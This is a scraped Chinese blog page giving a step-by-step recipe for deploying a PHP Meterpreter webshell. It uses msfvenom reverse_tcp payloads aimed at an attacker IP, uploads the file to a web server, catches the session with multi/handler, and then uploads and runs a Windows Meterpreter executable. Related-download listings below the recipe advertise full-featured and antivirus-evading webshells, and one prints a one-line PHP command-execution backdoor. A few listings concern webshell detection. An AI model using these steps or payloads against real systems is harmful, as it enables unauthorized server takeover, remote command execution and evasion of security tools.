`

php Meterpreter Webshell

 
阅读更多
1. msfvenom -p  php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php
2. 上传a.php到web服务器
3. 启动msfconsole
4. use multi/handler
5. set  LHOST Attacker's_IP
6. set LPORT  443
7. set payload php/meterpreter/reverse_tcp
8. exploit
9. 攻击者使用浏览器访问上传的文件
10.此时,攻击者可以得到一个meterpreter session
11.打开一个终端,然后再创建一个payload
msfpayload windows/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=4444
X>payload.exe
12. 在session中使用upload命令将payload.exe上传
13. 然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp
14. 在第一个终端中运行execute -f payload.exe
这时可以在第二个终端中获得一个meterpreter session
分享到:
评论

相关推荐

    php webshell 下载(目前功能强大齐全的php版webshell)

    声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里...

    各种php webshell大全

    声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号...

    php webshell 下载(自测 功能强大齐全的php版webshell)

    声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可。无需更改任何。(自测功能完整,无任何阉割,...

    webshell最新PHP

    webshell最新PHP NULL&SubnetMask=255.255.255.0&DNSServer1=192.168.10.1&DNSServer2=NULL&DNSServer3=NULL&DomainName=NULL&IPRouters=192.168.10.1

    wso_webshell_php_

    【标题】"wso_webshell_php_" 涉及的核心知识点是Webshell和PHP编程语言在网络安全中的应用。 Webshell,又称为Web后门,是一种通过Web服务端口植入的恶意脚本,允许攻击者远程控制被黑服务器。在描述中提到的...

    PHP webshell

    PHP webshell

    2011版php webshell 国外版

    标题 "2011版php webshell 国外版" 提到的是一个针对PHP环境的Webshell工具,这种工具在网络安全领域中具有特殊意义。Webshell通常被黑客用于远程控制和管理目标服务器,提供一系列命令执行、文件操作、数据库交互等...

    php大马 webshell.zip

    webshell,可以拿站,不过一定要清除痕迹 ,不然不要做非法用途。否则后果自负。

    php webshell 无后门

    php webshell 无后门,未加密

    php大马(webshell)

    增加了到达部分敏感目录的快捷链接。除了登录密码部分,其它所有代码已经过base64_decode加密(免杀性能好),请自行修改$admin['pass']处的登录密码。由于此php大马的功能过于强大,请勿用于非法用途。

    php webshell

    php webshell 需要的朋友可以下载!

    基于文本向量的php-webshell检测方法 (1).pdf

    "基于文本向量的php-webshell检测方法" 本文提出了一种基于文本向量的php-webshell检测方法,旨在解决传统静态检测方法不能有效识别混淆后的php-webshell脚本和从未出现过的php-webshell脚本的问题。该方法使用*n-...

    webshell,包含asp,php,aspx,jsp

    这里我们将深入探讨asp、php、aspx和jsp四种类型的Webshell以及相关安全知识。 1. ASP(Active Server Pages)Webshell:ASP是微软开发的一种服务器端脚本环境,用于生成动态网页。ASP Webshell通常是攻击者利用ASP...

    基于机器学习的PHP-WebShell扫描工具(附完整代码).zip

    【基于机器学习的PHP-WebShell扫描工具】 在网络安全领域,WebShell是一种常见的攻击手段,攻击者通过植入WebShell获取服务器的控制权。为了防御这种威胁,开发了各种扫描工具,其中“基于机器学习的PHP-WebShell...

    php-webshell大马(功能齐全)

    php小马 详细的资源以后我会推荐 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。

    php+webshell免杀的php

    可以方便进行目录管理,探测服务器信息,编辑修改删除创建文件,修改权限,连接mysql数据库 密码:nst

    php一句话webshell 服务端和客户端

    php一句话webshell 服务端和客户端,一句话为 <?php $_GET[2]($_GET[0]($_GET[1]));?> 支持函数system,passthru,shell_exec 可以执行操作系统任意命令,windows linux unix 等。 zhaoxypass@yahoo.com.cn,欢迎...

    php webshell 2022年11月 最新过安全狗 过360 无特征码版本

    php webshell 2022年11月 最新过安全狗 过360 无特征码版本 特点: 一、没有特征码; 二、全网独创,采用我自己写的加密技术,防止被反向解密; 三、仅用于学习用途,请勿用于法用途; 四、webshell源码采用的是c99

    WebShell管理中心箱子3.0源码.zip

    WebShell管理中心箱子3.0源码,系统采用PHP+MySql搭建 ,数据采用了PhpCms的加密方式,可靠性高 ,全局防注入、XSS等常见入侵方式,安全性高。 源码安装方法 1.新建webshell数据库 2.执行webshell.sql文件 3.上传到...

    非常好用的 PHP webshell

    PHP webshell, 非常好用的 PHP webshell 非常好用的 PHP webshell

Global site tag (gtag.js) - Google Analytics